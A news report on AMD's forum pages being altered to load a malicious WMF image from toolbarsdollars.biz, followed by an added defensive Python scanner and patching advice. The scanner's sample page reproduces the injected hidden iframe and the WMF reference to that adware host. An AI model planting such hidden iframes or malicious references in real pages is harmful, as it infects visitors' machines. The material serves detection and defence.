Visitors to AMD's website forums received a shock when their adware and virus scanners started blaring warnings about a possible Trojan horse being downloaded. Over the past few days, visitors have been complaining about strange popup alerts and slow forum speeds. Apparently, the forum webpages were modified to include a link to a malicious Windows Metafile (WMF) image hosted on toolbarsdollars.biz. A major WMF vulnerability that allows hackers to hide code inside of image files was disclosed a few weeks ago, and many users still have not patched against it.
As is typical of many web pages, AMD's forum pages load external PHP scripts through iframe tags. One of those scripts, in turn, pulled in a 16-kilobyte image called xpladv586.wmf that was being hosted at toolbarsdollars.biz, a well-known adware site. Several users reported that their anti-virus and anti-adware programs detected the WMF as containing a Trojan horse and promptly quarantined the file. They have also posted several pages' worth of messages to other forum members detailing what they did to clean up their computers and prevent future infections.
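The chain described above (an iframe pulling an offsite PHP script, which then serves a .wmf) is the kind of injection a forum operator can catch by scanning their own rendered pages. The script below is an added example, not code from the article or from AMD; it uses only the Python standard library, and the sample page, the allow-list of trusted hosts, and the file paths in it are constructed for illustration (only the hostname toolbarsdollars.biz comes from the article).

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample of a forum page with an injected hidden iframe and a
# WMF image reference. This is NOT the real AMD forum page; the paths are made up.
SAMPLE_PAGE = """
<html><body>
<h1>Forum</h1>
<script src="/js/forum.js"></script>
<img src="/images/logo.gif">
<iframe src="http://toolbarsdollars.biz/ads/show.php" width="0" height="0"></iframe>
<img src="http://toolbarsdollars.biz/xpladv586.wmf">
</body></html>
"""

# Hypothetical allow-list: hosts your site legitimately loads resources from.
TRUSTED_HOSTS = {"forums.amd.com"}


class ResourceCollector(HTMLParser):
    """Collect every tag that pulls an external resource into the page."""

    RESOURCE_TAGS = {"iframe", "script", "img", "embed", "object", "link"}

    def __init__(self):
        super().__init__()
        self.found = []  # list of (tag, url, attrs) tuples

    def handle_starttag(self, tag, attrs):
        if tag not in self.RESOURCE_TAGS:
            return
        a = dict(attrs)
        # src for most tags, data for <object>, href for <link>
        src = a.get("src") or a.get("data") or a.get("href")
        if src:
            self.found.append((tag, src, a))


def scan_page(html, trusted_hosts):
    """Return a list of (tag, url, reasons) for every suspicious resource.

    A resource is flagged when it is loaded from a host outside the
    allow-list, when it references a .wmf file, or when it is a zero-size
    (hidden) iframe, which legitimate page content rarely needs.
    """
    parser = ResourceCollector()
    parser.feed(html)
    findings = []
    for tag, src, attrs in parser.found:
        url = urlparse(src)
        host = url.netloc.lower()
        reasons = []
        if host and host not in trusted_hosts:
            reasons.append("offsite host %s" % host)
        if url.path.lower().endswith(".wmf"):
            reasons.append("WMF image reference")
        if tag == "iframe" and attrs.get("width") == "0" and attrs.get("height") == "0":
            reasons.append("hidden iframe (0x0)")
        if reasons:
            findings.append((tag, src, reasons))
    return findings


if __name__ == "__main__":
    for tag, src, reasons in scan_page(SAMPLE_PAGE, TRUSTED_HOSTS):
        print("%-7s %s  <- %s" % (tag, src, "; ".join(reasons)))
```

Run it over a saved copy of each forum page (or over the output of a crawler); anything loaded from a host you did not put on the allow-list deserves a look, and a .wmf reference on a page that should only carry GIF/PNG avatars is a strong signal of the injection described here.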
Other forums have been hit with similar exploits, and there are several steps that can be taken to protect your computer against what will likely be a wave of future attacks. The first, obviously, is to patch Windows against the WMF exploit. The exploit is discussed in Microsoft's Knowledge Base article #912919, and a patch can be downloaded either through Windows Update or via direct download.
Another tactic is to turn on Data Execution Prevention (DEP), a process that George Ou from ZDNet recently detailed in a blog posting. DEP prevents malicious programs from running by declaring certain portions of memory off-limits to code execution. Viruses and adware often try to take control of a computer by poking around memory locations and copying portions of code to those areas. Finally, users may want to switch to Mozilla's Firefox browser, as the exploit thus far only affects Microsoft's Internet Explorer.
You can read the main thread about the exploit on AMD's website here. Forum officials have posted that the problem has been fixed, but they aren't saying how the attackers accessed the webpages in the first place. We called AMD, but officials have not yet commented on the hacked forums.